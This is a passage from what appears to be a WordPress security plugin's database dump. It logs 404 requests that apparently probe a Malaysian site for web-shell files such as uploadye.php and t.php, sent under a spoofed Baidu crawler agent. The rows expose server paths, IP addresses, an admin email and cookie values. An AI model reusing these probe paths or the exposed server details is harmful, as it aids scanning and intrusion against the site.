IQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:19:\"REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"54685\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:10:\"SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544652.5952\";s:12:\"REQUEST_TIME\";s:10:\"1570544652\";}}','notice','2019-10-08 14:24:14','2019-10-08 14:24:12',35069280,36878512,'https://bintara.com.my/include/data/fonts/uddatasql.php',1,0,'177.212.112.222'),(27699,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/include/code/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"20.15.196.22\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=fb264dd350b2c982e0a16a083a331b9c\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"20.15.196.22\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycArDTiPzaBc@31OEzZgAAAQA\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycArDTiPzaBc@31OEzZgAAAQA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycArDTiPzaBc@31OEzZgAAAQA\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycArDTiPzaBc@31OEzZgAAAQA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"53099\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:10:\"SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycArDTiPzaBc@31OEzZgAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544642.9681\";s:12:\"REQUEST_TIME\";s:10:\"1570544642\";}}','notice','2019-10-08 14:24:05','2019-10-08 14:24:03',35059552,36864936,'https://bintara.com.my/include/code/mp.php',1,0,'20.15.196.22'),(27698,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"3.255.78.113\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b890b0b4ae467acfe8ed68b11b932d0d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"3.255.78.113\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"51073\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:10:\"SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyb8rDTiPzaBc@31OEzVQAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544626.9993\";s:12:\"REQUEST_TIME\";s:10:\"1570544626\";}}','notice','2019-10-08 14:23:49','2019-10-08 14:23:47',35080192,36883456,'https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php',1,0,'3.255.78.113'),(27697,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:70:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:37:\"/images/swfupload/images/uploadye.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"70.87.136.70\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c3a740c3ddbb42a532d3a62052fc8245\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"70.87.136.70\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:19:\"REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"49721\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:10:\"SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyb6nURUVLSjYCXpcIytwAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544618.9996\";s:12:\"REQUEST_TIME\";s:10:\"1570544618\";}}','notice','2019-10-08 14:23:40','2019-10-08 14:23:39',35058496,36862600,'https://bintara.com.my/images/swfupload/images/uploadye.php',1,0,'70.87.136.70'),(27696,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/data/cache/t.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"188.170.171.214\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c2825316e5302d29204b1183570f1970\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"188.170.171.214\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb1bDTiPzaBc@31OEzOwAAAQY\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb1bDTiPzaBc@31OEzOwAAAQY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyb1bDTiPzaBc@31OEzOwAAAQY\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyb1bDTiPzaBc@31OEzOwAAAQY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62621\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:10:\"SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyb1bDTiPzaBc@31OEzOwAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544597.8373\";s:12:\"REQUEST_TIME\";s:10:\"1570544597\";}}','notice','2019-10-08 14:23:19','2019-10-08 